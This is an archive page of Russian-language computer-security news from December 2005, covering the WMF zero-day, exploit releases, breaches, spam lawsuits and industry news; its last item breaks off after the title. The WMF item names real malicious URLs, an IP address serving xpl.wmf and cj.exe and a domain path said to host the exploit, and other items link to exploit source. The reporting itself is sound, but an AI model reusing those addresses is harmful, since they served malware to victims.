uinC: Новости компьютерной безопасности

Архив новостей за 2005 год

Приветствуем!

Новости из Security Мира

31/12/2005 18:57 С НОВЫМ ГОДОМ!
Команда UINC поздравляет посетителей сайта с наступающим, 2006-м годом! Желаем вам всем, коллеги и друзья, роста профессионального мастерства и удачи! Оставайтесь с нами!
Мы

31/12/2005 13:50 Выход phpBB2.0.19
Разработчики популярного ПО для построения форумов phpBB в лице Paul Laudanski преподнесли своим пользователям предновогодний подарок в виде выхода новой версии phpBB 2.0.19. Помимо обычных багофиксов новый релиз устраняет 3 уязвимости - две из них связаны с возможностью проведения XSS-атаки при обработке URL (правда, только в "браузере всех времён и народов" ослике), третье добавление включает опцию, при помощи которой можно задавать количество безуспешных попыток авторизации (для предотвращения попыток подбора пароля на основе словаря - брут-форс).
Анонс

31/12/2005 12:55 Эксплоит уязвимости в ядре Linux
Продолжая тему эксплоитов хотелось бы отметить появление исходного кода, эксплуатирующего уязвимость, обнаруженную в ядре Linux до версии 2.6.11. Обнаруженная в системном вызове sys_epoll_wait уязвимость позволяет получить локально полномочия суперпользователя.
Исходный код

31/12/2005 12:35 Уязвимость Windows добавлена в Metasploit Framework
Известный исследователь компьютерной безопасности H D Moore опубликовал и включил в свою программу Metasploit Framework, предназначенную для тестирования компьютера на наличие уязвимостей новый модуль на Перле, который представляет собой эксплоит нашумевшей уязвимости в обработке файлов формата WMF ОС Windows. Желающие могут ознакомиться с исходным кодом, посетив нижеприведённую ссылку.
Исходный код

31/12/2005 11:53 AOL: знаменитости остаются популярными у спамеров
Использование имен знаменитостей для выманивания денег по-прежнему осталось самым популярным среди спамеров, утверждает провайдер America Online в публикации о самых популярных темах англоязычных незапрошенных писем. Одной из самых популярных тем 2005 года была «Дональд Трамп нуждается в Вас — пожалуйста, ответьте». В 1990-х годах подобные письма отсылались от имени Билла Гейтса и других известных богатых людей. Еще одна тема для спама рассчитана на тех, кто верит в подарки от крупных компаний. Спамеры незатейливо заманивают открыть письмо при помощи фразы «Получите Apple iPod Nano, PS3 или Xbox 360 бесплатно». В десятку самых популярных тем попали предложения от мошенников с ценными бумагами, финансовыми операциями, а также предложения по сильно заниженным ценам всевозможных товаров и услуг — от лекарств до займов. Эксперты по спаму из AOL и других компаний говорят, что большая часть спама поступает с зараженных компьютеров домашних пользователей. Это делает невозможным отслеживание авторов.
CNews

31/12/2005 11:31 Dell "убьет" Internet Explorer?
Dell начинает поставки ПК с предустановленным браузером Firefox. Возможно, это станет очередной вехой в борьбе производителей продуктов с открытым исходным кодом против корпорации Microsoft. Dell UK, британский филиал американской Dell, начинает поставки ноутбуков и десктопов с предустановленным браузером Firefox. Разработчик Firefox Блейк Росс (Blake Ross) подтвердил эту информацию в своем блоге. Росс пишет, что британское отделение Dell действительно будет поставлять браузер с открытым кодом с новыми ПК. По его словам, официальное объявление о партнерстве между Mozilla и Dell пока не сделано, и более подробная информация об этом появится позднее. В Dell Asia Pacific утверждают, что пока не намерены предлагать Firefox потребителям. Пока остается непонятным, заменит или дополнит Firefox браузер Internet Explorer, встроенный в Windows. Поставка IE с операционной системой помогла Microsoft завоевать доминирующее положение на рынке программ для просмотра веб-страниц. Разработчики Firefox надеются, что с их браузером произойдет примерно то же самое. Продукция Dell занимает примерно 15% рынка компьютеров в Великобритании, и такое партнерство может привести к увеличению доли Firefox.
Подробности

31/12/2005 10:22 Wikipedia собирается размещать на своих страницах рекламу
Основатель интернет-энциклопедии Wikipedia Джимми Уэльс (Jimmy Wales) заявил, что сайт, возможно, будет в будущем зарабатывать на размещении рекламы сотни миллионов долларов в год, пишет Times. Сейчас необходимые средства Wikipedia получает благодаря добровольным пожертвованиям. Джимми Уэльс отметил, что несмотря распространенной противодействие самой идее размещения рекламы на страницах энциклопедии, в связи с упущенными средствами возникают некоторые серьезные вопросы. По мнению экспертов, Wikipedia может оказаться очень привлекательной рекламной площадкой. В декабре число показов страниц ресурса достигло отметки в 2,5 миллиарда. Посещаемость Wikipedia удваивается каждые четыре месяца. Согласно исследованию, проведенному Nielsen/Netratings, Wikipedia в 2005 году являлась девятым по темпам роста ресурсом в сети. В то же время члены сообщества Wikipedia, пишущие статьи на добровольной основе и не получающие за это никакой платы, не приветствуют предложений о коммерциализации сайта. Сам же персонал Wikipedia насчитывает только трех человек с полной занятостью.
Источник

30/12/2005 15:11 Как настроить безопасный PC?
На сайте журнала PC Magazine опубликована довольно полезная статья под названием "Create an Indestructible Shared PC". Задача, которая ставилась при написании статьи - рассказать, как можно создать безопасный PC с возможностью предоставления общего доступа. В качестве инструментария использовался Shared Computer Toolkit от Microsoft а также User Profile Hive Cleanup Service.
Cтатья

30/12/2005 11:27 Сайт NSA шпионит за своими посетителями
Зайдя на сервер Национального агентства безопасности США, вы рискуете подхватить на свой компьютер файлы cookies, с помощью которых агенты NSA получат исчерпывающую информацию о вашей сетевой активности. По крайней мере, такой выглядела ситуация за несколько дней до того, как директор Центра за демократию и технологии Ари Шварц (Ari Schwartz) и Associated Press обратились к властям США с официальным запросом по поводу законности такой практики. Руководство NSA, разумеется, немедленно распорядилось прекратить подсадку cookies, слишком глубоко сующих нос в частную жизнь посетителей сайта, однако вопросы относительно распространенности такой практики по-прежнему остаются. По состоянию на минувший вторник, пишет AP, сервер NSA подсаживал посетителям файлы cookies, срок "годности" которых составлял тридцать лет, а это значит, что любой такой файл гарантированно оставался на машине очередного потерпевшего в течение всего срока ее штатной эксплуатации (если, конечно, винчестер этой машины не подвергался форматированию или не вычищался вручную ее владельцем). По словам пресс-секретаря NSA, речь в данном случае идет об "ошибке", допущенной в результате неправильной настройки нового серверного программного обеспечения. Программист, занимавшийся настройкой программы, якобы забыл изменить срок действия cookies с установленных там по умолчанию тридцати лет до окончания пользовательской сессии, в результате чего и возник скандал. Любопытно, что скандал возник не на пустом месте. Еще в 2003 году бюджетный отдел Белого дома запретил установку "вечных" cookies серверами федеральных агентств за исключением случаев, когда такие действия обосновывались "настоятельной необходимостью". Даже если такая необходимость и возникает, информация об использовании таких файлов должна быть прямо доведена до сведения пользователей.
Источник

30/12/2005 10:45 Marriott потерял данные о 200 тыс. человек
Marriott Vacation Club International, одно из подразделений известной сети отелей Marriott, занимающееся сдачей апартаментов в аренду, сообщило о потере резервных накопителей, на которых содержатся номера кредитных карт и номера социального страхования 206 тыс. клиентов и сотрудников подразделения, а также его владельцев. Таким образом, все эти лица оказались под угрозой кражи личных данных. Представитель MVCI уже выразил свое сожаление по поводу инцидента и сообщил, что уведомления всем пострадавшим вследствие утечки уже разосланы. По сведениям Washington Post, компания узнала о потере резервных лент в середине ноября 2005 года и сразу же инициировала расследование. Однако результаты плачевны: носители с приватной информацией не найдены, а о лицах, несущих за это ответственность, пока ничего не известно. Подразделение MVCI уже поставило в известность об инциденте Секретную службу США и несколько финансовых организаций. Все это было проделано еще до рассылки уведомлений пострадавшим гражданам и официального заявления. В принципе, сегодня даже неизвестно, были ли резервные ленты украдены или просто потеряны. Представитель MVCI заявил, что в результате инцидента некоторые сотрудники компании могут получить дисциплинарные взыскания или быть уволенными.
Более подробно

30/12/2005 10:24 Напавший на eBay хакер признал себя виновным
Житель Орегона признал себя виновным в создании компьютерного червя, при помощи которого в 2003 году была создана сеть из 20 тысяч "компьютеров-зомби" (botnet) и проведена атака на сайт интернет-аукциона eBay, передает Breitbart.com. Теперь 21-летнему Энтони Кларку грозит тюремное заключение сроком до 10 лет и штраф, сумма которого может достичь 250 тысяч долларов. Представитель прокуратуры США пояснил, что Кларк со своими сторонниками, используя контролирую ими хакерскую сеть, устроили DOS-атаку на eBay и другие популярные сайты.
Источник

29/12/2005 16:57 В Санкт-Петербурге судят интернет-хулигана
В Смольнинском федеральном суде Санкт-Петербурга сегодня состоялось первое слушание по делу Александра Втулкина, интернет-хулигана, именующего себя в сети "министром безопасности Русской республики". Новоявленный "министр" отправил по электронной почте ряд писем, из которых было понятно, что радикальная политическая партия "Русская республика" вынесла и намеревается в скором времени привести в исполнение смертный приговор губернатору Санкт-Петербурга Валентине Матвиенко за ее якобы "антирусскую политику". По факту угроз было возбуждено уголовное дело согласно статье 119 Уголовного Кодекса России, а Втулкин был объявлен в федеральный розыск. Онлайн-экстремиста задержали на Витебском вокзале 17 августа 2005 г., когда он пытался покинуть Санкт-Петербург и отправиться на Украину. В ходе предварительного следствия правоохранительные органы все еще инкриминировали Втулкину угрозы убийством высокопоставленному лицу. Однако вскоре обвинение было переформулировано на распространение через СМИ материалов, содержащих сведения, направленные на возбуждение национальной, расовой и религиозной вражды и ненависти, сопряженное с угрозами применения насилия, согласно которому Втулкина будут судить по статье 282 части второй УК РФ. Это первый в истории судебной практики случай, когда за виртуальные угрозы человеку грозит вполне реальная ответственность. Сам Втулкин заявил, что на самом деле покушение на Валентину Матвиенко готовил председатель партии "Свобода" Юрий Беляев, а он как "министр безопасности" пытался таким образом предотвратить страшное преступление и выступить в роли спасителя губернатора. Беляев все обвинения в свой адрес отверг, а слова и действия Втулкина назвал "глупостью и мелким хулиганством".
Источник

29/12/2005 16:42 Эксплоит уязвимости IIS
Ранее мы сообщали о наличии уязвимости в Вэб-сервере от Microsoft IIS при обработке определённого вида URI. Некто Lympex выпустил эксплоит на C++ для платформы win32.
Эксплоит

29/12/2005 13:28 WINE@Etersoft 0.9 Local запустит 1С:Предприятие в Linux или FreeBSD
Компания Этерсофт совместно с компанией Линуксцентр представляет продукт WINE@Etersoft 0.9 Local, предназначенный для запуска Windows-приложений в свободных операционных системах на платформе x86. WINE@Etersoft позволяет использовать такие российские программы, как 1С:Предприятие 7.7, 1С:Бухгалтерия 6.0, Консультант Плюс, Инфо-Бухгалтер, Кодекс, и некоторые другие. Отличием WINE@Etersoft от обычной сборки Wine являются исправления для поддержки коммерческих российских программ (например, 1С:Предприятие 7.7). В данной версии не поддерживаются локальные ключи HASP и совместная работа с файлами. Опубликованы свободные пакеты Wine для всех поддерживаемых систем, а также исходные тексты, сообщает linux.org.ru.
Исходники

29/12/2005 13:09 Дополнительные подробности о новом эксплоите
В блоге на сайте SANS ведётся некое подобие онлайнового дневника под названием "Windows WMF 0-day exploit in the wild" с приведением деталей эксплоита, которые выясняют специалисты по компьютерной безопасности. Приводится информация, что загружается шпионский модуль Winhound, который является поддельным антишпионским и антивирусным ПО, предлагающим пользователям купить лицензионную версию. Также сообщается, что в некоторых случаях технология DEP (Data Execution Prevention) процессоров AMD64. IE автоматически запускает "Windows Picture and Fax Viewer". Что касается Firefox, в нём появляется диалоговое окно, которое предлагает запустить этот просмотрщик.
Блог SANS

29/12/2005 12:40 Уязвимость в Internet Explorer
Christian Deneke от имени немецкой группы BuHa-Security Community сообщает о наличии уязвимости в браузере Internet Explorer. Приводятся 3 примеры HTML-кода, который приводит к аварийному завершению работы браузера. Как следует из дальнейшего анализа, уязвимость связана с некорректной обработкой mshtml.dll разыменованного нулевого указателя (перевод предложен SecurityLab, в оригинале звучит - null pointer dereference). Уязвимость проверена в M$ IE 6 SP2 - Win XP Pro SP2 и M$ IE 6 - Win 2k SP4 (также проверено лично в IE 6.0.2800.1106 c SP1 в Win98SE - результат аналогичный). Патчей на настоящий момент патча не существует. Как пишет автор, M$ собирается включить патч в грядущий сервис-пак. Все 3 примера HTML-кода приведены на странице, ссылка на которую приведена ниже.
Подробности

29/12/2005 11:34 Skype делают полностью бесплатным
Компании Skype преподнесли неприятный сюрприз. Компания Orb Networks разработала сервис для работы с голосовой почтой Skype V4S (Voicemail for Skype), который является бесплатным. Служба интернет-телефонии Skype имеет огромную популярность в мире. Ей она обязана, в первую очередь, бесплатности своей основной услуги — телефонной связи между компьютерами. Однако, привыкнув пользоваться службой, пользователи вынуждены обращаться к дополнительным сервисам системы, которые отнюдь не бесплатны. Компания Orb Networks разработала сервис для работы с голосовой почтой Skype V4S (Voicemail for Skype). Новый сервис является бесплатным, позволяет читать голосовую почту на любом компьютере с установленным плеером потокового звука, подключенным к интернету (не требуя установки дополнительного ПО), а также отправляет оповещения о получении новых сообщений по СМС и электронной почте и дает возможность перематывать полученные сообщения вперед и назад, так, как они воспроизводятся в обычном медиа-проигрывателе. У службы есть и свои недостатки. Для ее работы на компьютере пользователя, работающем под управлением Windows XP, требуется установка бета-версии клиентской части разработанного компанией приложения, выполняющего функции управления и размещения получаемой голосовой почты в виде файлов в формате .WMA. Кроме того, компьютер должен быть постоянно подключен к интернету и сети Skype. Новая служба едва ли будет способна вытеснить существующий платный сервис голосовой почты Skype.
CNews

29/12/2005 11:01 Уязвимость в Windows при обработке WMF-файлов
Эта новость перекликается с предыдущей. Некто Josh из Остина (штат Техас, США) сообщает о том, что при посещении некоторых Вэб-сайтов на полнопатченной Windows он с удивлением обнаружил, что его компьютер был заражён (изменился фон рабочего стола и не работал Task Manager). Дальнейший анализ привёл автора к выводу, что заражение произошло через файлы xpl.wmf и xpladv470.wmf. Как дальше замечает автор, уязвимость в обработке WMF-файлов была устранена Microsoft патчем, описанным в бюллетене MS05-053 (KB896424). Судя по всему, уязвимость всё равно осталась. Уязвимость проявляется тремя путями: при посещение специальным образом формленной Вэб-страницы, при открытии файла в Explorer (проводнике), при выполнении файла в Windows. Дальнейший анализ, проведённый специалистами привёл к разноречивым выводам. Некоторые утверждают, что выполняется код с привилегиями SYSTEM, другие полагают, что только от текущего пользователя. Daniel Bonekeeper выяснил, что при посещении определённых сайтов при помощи скрытого тега <frames> открывается файл http://69.50.183.34/m.html, который, в свою очередь, открывает файл http://69.50.183.34/xpl.wmf, являющийся эксплоитом. Этот эксплоит загружает файл http://69.50.183.34/cj.exe и запускает его. Этот файл в свою очередь устанавливает в системе то, что называется термином BHO (browser helper objects), являющийся шпионским ПО. Необходимо сказать, что Microsoft признала факт наличия уязвимости и выпустила Security Advisory (912840), в котором в общем-то не даётся никаких конкретных рекомендаций, кроме общих слов. Рекомендации приводятся в блоге Josh. Автор рекомендует запустить (с полномочиями админа) команду regsvr32 shimgvw.dll /u (отключение Windows Picture and Fax Viewer). Также эксплоит содержится по адресу unionseek.com/d/t1/wmf_exp.htm. Cсылки с подробностями приведены ниже.
Блог Josh
Описание на Securityfocus
Бюллетень Microsoft

29/12/2005 10:45 Обнаружены троянские программы, использующие новую уязвимость Windows
«Лаборатория Касперского» сообщает об обнаружении целого семейства троянских программ, использующих новую уязвимость в процедуре обработки файлов типа Windows Meta File (WMF). Оно получило название «Trojan-Downloader.Win32.Agent.acd». Использование данной WMF- уязвимости особенно опасно потому, что она имеет статус критической, а соответствующего исправления программных модулей от компании Microsoft еще не существует. Уязвимости в обработке WMF-файлов подвержены операционные системы Microsoft Windows XP с пакетами обновлений Service Pack 1 и Service Pack 2, а также Microsoft Windows Server 2003 Service Pack 0 и Service Pack 1. Использование WMF-уязвимости возможно при работе с браузером Internet Explorer, служебной программой Microsoft Windows «Проводник» и, при выполнении ряда дополнительных условий, браузером Firefox. Заражение троянскими программами семейства «Agent.acd» производится при посещении пользователем сайтов unionseek.com и iframeurl.biz. Проникая с указанных сайтов в систему, вредоносный код запускается посредством WMF-уязвимости. Затем «Agent.acd» загружает на атакованный компьютер другие троянские программы, характер действий которых определяется злоумышленниками. «Лаборатория Касперского» предупреждает пользователей о появлении вредоносных программ, использующих новую WMF-уязвимость, и рекомендует не открывать незнакомые файлы с расширением *.wmf, а также, в случае, если работа в интернете осуществляется при помощи браузера Internet Explorer, установить уровень безопасности на максимальную отметку, “High”. Эксперты не исключают появления новых модификаций троянских программ, использующих WMF-уязвимость, в самое ближайшее время.
Описание

29/12/2005 10:20 Британский предприниматель добился от спамеров выплаты компенсации
Житель Великобритании добился выплаты компенсации от британской фирмы, присылавшей в его личный почтовый ящик спам. Это стало возможно благодаря новому законодательству Евросоюза, утвержденному три года назад. Как сообщает BBC News, британец Найджел Робертс (Nigel Roberts) оформил судебное заявление, намереваясь привлечь к ответственности фирму Media Logistics UK, от которой он получал спамерские сообщения. Он потребовал выплаты неустойки в размере 300 фунтов, так как большая сумма квалифицировала бы более серьезный иск и более сложные процедуры разбирательства. Фирма-ответчик согласилась на внесудебное урегулирование. Она без решения суда выплатила истцу 270 фунтов и компенсировала его судебные издержки в размере 30 фунтов. Это первое дело такого рода, когда было применено новое европейское законодательство, предусматривающее ответственность за навязывание коммерческой рекламы по электронной почте.
Подробности

28/12/2005 12:21 Ограбили Артемия Лебедева
Сегодня стало известно об ограблении студии известного веб-дизайнера Артемия Лебедева в Москве. Такую информацию приводит агентство “Интерфакс” со ссылкой на источник в правоохранительных органах столицы. Как рассказал собеседник агентства, накануне в милицию обратился А. Лебедев и заявил, что в среду в его офис, расположенный в доме №5 по Газетному переулку в Москве, ворвались трое неизвестных. Угрожая словами двоим менеджерам, злоумышленники приковали их к трубе наручниками, после чего взломали сейф, из которого похитили 30 тыс. долл, семь сотовых телефонов и ноутбук. По предварительному подсчету, ущерб составил более 900 тыс. российских рублей. “Студия Артемия Лебедева” — ведущая российская команда профессиональных дизайнеров, в портфолио которой столько хороших проектов, что хватило бы на десять крупных сетевых агентств”, сообщает "Интерфаксу", источник в правоохранительных органах столицы.
Источник

28/12/2005 11:39 Вирус маскируется под новый MSN Messenger
Штамм вируса Virkel атакует пользователей MSN Messenger, предлагая им загрузить бета-версию программы, сообщают в финской антивирусной фирме F-Secure. Вирус рассылает ссылки на сайт, где якобы находится бета-версия MSN Messenger 8, используя сам Messenger. На сайте находится файл BETA8WEBINSTALL.EXE, который и представляет собой тело Virkel. Установившись на компьютере, вирус "зомбирует" его, подключаясь к ботнету – сети зараженных компьютеров – для ожидания команды от хакера. Бета-версия MSN Messenger 8 уже вышла 12 декабря, но Microsoft раздала ее узкому кругу бета-тестеров, и продукт называется по-другому: Windows Live Messenger, сообщила представитель корпорации. Пользователей призывают не загружать из Сети несанкционированные версии во избежание подделок.
CNews

28/12/2005 11:21 Базовые принципы помещения сервисов в chroot окружение
В статье даются общие рекомендации по созданию chroot окружений под Linux, приводится пример изолирования Apache 1.3.x + PHP 5 с учетом взаимодействия с MySQL (взято с opennet.ru).
Статья

28/12/2005 10:40 RIAA просит американский Сенат оказать давление на Россию
Ассоциация звукозаписывающей индустрии США RIAA объявила о начатой кампании в американском Сенате, призванной оказать давление на Россию в деле борьбы с пиратством в области интеллектуальной собственности, сообщает интернет-издание The Inquirer. Как следует из опубликованного накануне на сайте ассоциации сообщения, руководство RIAA намеревается добиваться недопущения вступления России в ВТО в случае, если российские власти будут продолжать игнорировать разгул в стране пиратства. Как ранее сообщалось, подобные заявления звучали в адрес американских властей и от других ассоциаций различных мировых производителей - например, от международной музыкальной федерации IFPI и софтверного альянса BSA. Глава RIAA Митч Бейнвол (Mitch Bainwol) подчеркивает, что отношения между США и Россией должны строиться на понимании принципов взаимно взятых на себя обязательств и букве закона, пишет The Inquirer.
Подробности

27/12/2005 14:43 Visa сообщает о возможной утечке данных о банковских картах
Американское подразделение финансовой компании Visa в минувшую пятницу объявило о "возможной утечке данных, касающихся карт, выпущенных на территории США". Потенциальная утечка касается только дебетовых карт, причем большинство из них уже заблокированы. Согласно официальным данным, уязвимости подвержены карты, выпущенные на протяжении последних двух недель. В субботнем заявлении для прессы служба безопасности Visa отметила, что в процессинговом центре очень оперативно сработали системы безопасности и все банки, которым принадлежат уязвимые карты уже поставлены в известность. Достоверно не известно, что именно за уязвимость была обнаружена, также не известно и какие банки выпускали уязвимые карты. За текущий год это уже четвертый случай, когда держатели пластиковых карт оказываются подвержены тем или иным угрозам, касающимся их банковских счетов. Самый крупный случай компрометации банковских был в июле 2005 года, когда под угрозой оказались более 40 миллионов карт Visa и MasterCard.
Источник

27/12/2005 13:39 Интервью по вопросам развития отечественных суперкомпьютеров
Опубликовано интересное интервью с Сергеем Михайловичем Абрамовым, научным руководителем и исполнительным директором суперкомпьютерной Программы "СКИФ", сообщает Opennet.ru.
Текст интервью

27/12/2005 12:57 15 лет в истории браузеров: что дальше?
Ровно 15 лет назад на свет появился первый веб-браузер — революционная программа, которая позволяла бороздить просторы Всемирной сети, читать и редактировать документы. Первый веб-клиент, так называемый браузер-редактор, создал Тим Бернерс-Ли и выложил в открытый доступ 25 декабря 1990 г., перед Рождеством. Это был чудесный новогодний подарок для всего человечества. Создатель первого браузера хотел дать людям инструмент для проявления их творческого потенциала, чтобы каждый мог без труда опубликовать в Сети результаты своего творчества. Об этом он рассказывает в своем блоге, который открылся на днях. Пятнадцать лет спустя Тим Бернерс-Ли и другие эксперты признают, что создание инструментов для совместной работы и творчества людей в онлайне — это по-прежнему главная задача для разработчиков программного обеспечения. Об эволюции браузеров и о том, в каком направлении пойдет научный прогресс, пишет eWeek. Если спросить Тима Бернерса-Ли, что его больше всего удивляет в развитии браузеров, то он ответит — совсем не то, что одна компания контролирует 85% этого рынка, нет. Больше всего его шокирует тот факт, что так много людей используют браузеры, хотя эти программы очень далеки от совершенства. В этом году количество пользователей интернета на Земле превысило 1 млрд человек. Браузер до сих пор не стал по-настоящему творческим инструментом, и он очень сильно ограничивает свободу человека в способах получения и создания информации в онлайне. В 2005 г. мы наблюдали сумасшедший рост популярности блогов, RSS и wiki, а также новых интерактивных веб-приложений. Люди сейчас хотят большего, чем просто ходить по страничкам и читать их. Браузеры и сами веб-сайты должны стать более функциональными и динамичными. «Было бы ошибкой думать, что браузер — это статичный и четко определенный объект, как это есть сейчас. Я думаю, мы увидим существенные улучшения в этой области», — сказал Тим Бернерс-Ли.
Блог Бернерса-Ли

27/12/2005 12:31 Борец со спамом попался на спаме
Генеральный прокурор штата Флорида, сделавший себе имя на борьбе с несанкционированными почтовыми рассылками, неожиданно сам попался на рассылке банального спама. Как оказалось, даже у генерального прокурора могут не выдержать моральные устои, когда речь идет о губернаторском кресле. Газета St. Petersburg Times сообщила на днях о том, что Чарли Крист (Charlie Crist), пробивший в свое время закон, в соответствии с которым спаммер может получить до пятисот долларов штрафа за каждое несанкционированное письмо, уже изрядно достал своих потенциальных избирателей собственной непрошеной рассылкой. По словам 41-летнего финансиста, ставшего, в числе прочих, одним из объектов политрассылки, он целых пять раз отправлял на адрес Криста сообщения с просьбой вычеркнуть его фамилию из списка, однако так ничего и не добился. Впрочем, представители мистера Криста утверждают, что их клиент -- никакой не спаммер. В конце концов, по закону Флориды спам -- это рассылка сообщений, вводящих получателя в заблуждение, пишет CNET, а в письмах, рассылаемых от имени Криста -- правда, только правда и ничего, кроме правды. По крайней мере, так считают представители Криста.
Источник

27/12/2005 12:17 ASPLinux начинает бета-испытания ASPLinux 11
Компания ASPLinux объявляет о готовности новой версии дистрибутива ASPLinux для широкомасштабного тестирования. Традиционно новый дистрибутив ASPlinux 11 основан на репозитарии Fedora, создаваемым сообществом разработчиков под эгидой компании Red Hat. Базой для разработки ASPLinux 11 послужил дистрибутив Fedora Core 4. За полгода, прошедшие с момента выпуска этого дистрибутива, стало ясно, какие пакеты требуют доработки и исправлений, проведена значительная работа по адаптации программных и аппаратных разработок. Кроме того, регулярный и массовый выпуск обновлений сделал Fedora Core 4 одним из наиболее стабильных дистрибутивов. В свою очередь ASPLinux предлагает российским пользователям не только стабильность, но и доработку ядра и состава пакетов в соответствии с российской спецификой.
Подробности

27/12/2005 11:42 Sophos: советы по противодействию спамерам
«ДиалогНаука», официальный партнер компании Sophos в России, сообщает, что реализация практических рекомендаций в области политики использования учетной записи электронной почты может быть эффективным средством минимизации спама, получаемого конечными пользователями. И если даже такие политики нельзя назвать полным решением, они могут служить хорошим рубежом обороны против нежеланных электронных посланий. Наилучшим способом нанести немедленный удар по количеству спама, получаемого вашей компанией, по мнению экспертов Sophos, является запуск комплексного решения по фильтрации электронной почты на вашем почтовом шлюзе. Это защитит ваш бизнес не только от спама, но и от других угроз, создаваемых вирусами и червями, распространяемыми через e-mail. Также даются рекомендации по защите от спама для пользователей. Подробности по ссылке, приведённой ниже.
Подробности

27/12/2005 10:35 Создатели Google названы «людьми года»
В пятницу два основателя Google разделили между собой титул «Человек года», присужденный им журналом Financial Times. 32-летние Сергей Брин и Ларри Пейдж удостоились этой чести за то влияние, которое созданная ими семь лет назад компания оказала на пользователей интернета за последние 12 месяцев. Газета отмечает, что этому не повредила «взлетевшая стоимость акций» компании. Рыночная капитализация Google приблизилась к $130 млрд, что ставит ее на одну доску с IBM, а впереди из технологических компаний остаются лишь Intel и Microsoft. Брин выразил надежду, что со временем поисковая машина компании сможет применяться для решения «сложных задач в таких областях, как микробиология». «Не то чтобы мы как-то ограничивали себя или у нас была концепция на ближайшие 20 лет или что-то в этом роде, — сказал он в интервью Financial Times. — Мы вовсе не прочь попробовать что-нибудь новое».
Подробности

26/12/2005 17:31 Процессоров Pentium больше не будет
Торговая марка "Pentium" уходит с компьютерного рынка - корпорация Intel планирует ввести новые обозначения для процессоров своего производства. Не исключено, что слегка изменится и логотип самой корпорации. Переход на новую кодировку произойдёт с выходом новых процессоров Intel, известных сейчас под кодовым именем Yonah. Одно- и двухъядерные процессоры будут именоваться Solo и Duo и получат пятизначные индексы, в которых будет зашифровано энергопотребление процессора:
Exxxx - 50 и более ватт;
Txxxx - 25-49 ватт;
Lxxxx - 15-24 ватта;
Uxxxx - 14 и менее ватт.
Цифра после букв (E/T/L/U) будет означать количество ядер в процессоре, пишет издание Addict3D. Остальные три цифры, скорее всего, будут означать тактовую частоту, объём кэш-памяти и другие параметры. Наименование "Pentium" появилось около 12 лет назад, когда был выпущен процессор, сменивший Intel 80486. Год назад слово "Pentium" исчезло с маркировки серверных процессоров Intel Xeon, тогда же компания ввела цифровые обозначения процессоров. До того момента покупатели могли ориентироваться по тактовой частоте процессора, теперь же, чтобы узнать её, нужно заглянуть в справочник. Что же до логотипа Intel, его начертание изменится незначительно - буква "е", расположенная ниже других, встанет вровень с остальными.
Более подробно

26/12/2005 11:15 Назначен "дедлайн" для бесплатных входящих звонков
Госдума установила срок для отмены платы за входящие телефонные соединения – 1 июля 2006 года. Также депутаты ввели в Закон “О связи” несколько исключений, в случае которых входящие звонки по-прежнему будут платными. Между тем, представители операторов заявили о том, что введение в одностороннем порядке бесплатных входящих вызовов противоречит свободе предпринимательства. В ходе второго чтения было определено, когда же за входящие звонки не нужно будет платить, — это начнется с 1 июля 2006 года. Кроме того, был определен ряд случаев, когда входящий звонок все-таки будет платным. Во-первых, это произойдет тогда, когда звонок осуществляется за счет принимающей стороны. «Остается возможность принимать плату за входящие звонки в том случае, если соединение с абонентом происходит с помощью вызова телефониста и с согласия вызываемого абонента, — пояснил вице-спикер Госдумы Владимир Катренко. — Это значит, что если гражданин, например, поиздержался на отдыхе или в командировке, у него есть возможность позвонить домой, на работу или куда-нибудь еще за счет тех, кому он звонит». Во-вторых, по-прежнему платным будет входящее соединение, «установленное с абонентом, находящимся за пределами территории субъекта РФ, указанной в решении о выделении оператору связи ресурса нумерации, включающего в себя выделенный данному абоненту абонентский номер». Это означает, что если абонент уедет со своим телефоном в другой регион или страну и будет при этом пользоваться услугами автоматического роуминга, то ему придется платить за входящие звонки, потому что в них присутствует междугородняя/международная составляющая.
Более подробно

26/12/2005 10:58 Opera опровергает слухи о покупке Microsoft
В Интернете усиленно мусировались слухи о том, что Microsoft покупает норвежскую компанию Opera, которая производит и поддерживает одноименный браузер. Как стало известно, представители Opera категорически опровергают возможность подобной сделки, утверждая, что между производителем браузера Opera и корпорацией Microsoft нет никаких отношений. В минувшую пятницу представители норвежской компании заявили, что слухи о ее покупке Microsoft не имеют под собой никакой почвы. Более того, по их словам, Opera даже не получала никаких подобных предложений.
Источник

26/12/2005 10:41 Опубликованы детали уязвимости в iTunes и QuickTime
Впервые об уязвимости в программах iTunes and QuickTime стало известно в конце ноября. На днях ряд деталей опубликовал независимый эксперт в области компьютерной безопасности Том Феррис, сообщает "Компьюлента". Злоумышленник может получить управление компьютером после запуска пользователем файла *.mov, содержащего вредоносный код, выполнение которого вызывает аварийное закрытие программы. Потенциально уязвимы все существующие на сегодняшний день версии медиа-плееров iTunes и QuickTime. Хотя ранее сообщалось, что дыра представляет опасность только для Windows-версий указанных программных продуктов, Феррис подчёркивает, что дыра опасна и для пользователей Mac OS X. Компания Secunia, работающая на ниве компьютерной безопасности, присвоила данной уязвимости средний уровень опасности, в то время как группа французских специалистов из Security Incident Response Team оценила дыру как "критическую". Представители Apple пока воздерживаются от комментариев. Феррис сообщил о проблеме в Apple в начале месяца, а второго декабря опубликовал детали уязвимости и файлы с примерами использования. Компания Apple необходимую "заплатку" пока не выпустила, а Феррис рекомендует пользователям не открывать файлы, полученные из непроверенных источников.
Подробности

25/12/2005 18:37 ASP против PHP
Довольно любопытную статью выпустил Halstatt Pires на сайте WebProNews. Статья посвящена сравнительному анализу двух популярных в настоящее время языков для создания динамических Вэб-сайтов - PHP и ASP. Как известно, ASP (Active Server Pages) - детище Microsoft и, соответственно, применяется для работы с Вэб-сервером IIS. PHP (Personal Home Pages) создан Расмусом Лердорфом и, в основном, применяется на Вэб-серверах под управлением ОС UNIX (хотя существует дистрибутив для NT-подобных систем). Сравнение приведено по следующим категориям: цена (стоимость), скорость работы, поддержка различных платформ, базовый синтаксис (например, утверждается, что PHP близок по синтаксису к C/C++, в то время, как ASP - к Visual Basiс), взаимодействие с СУБД.
Cтатья

25/12/2005 12:33 Через Vista могут утечь конфиденциальные данные
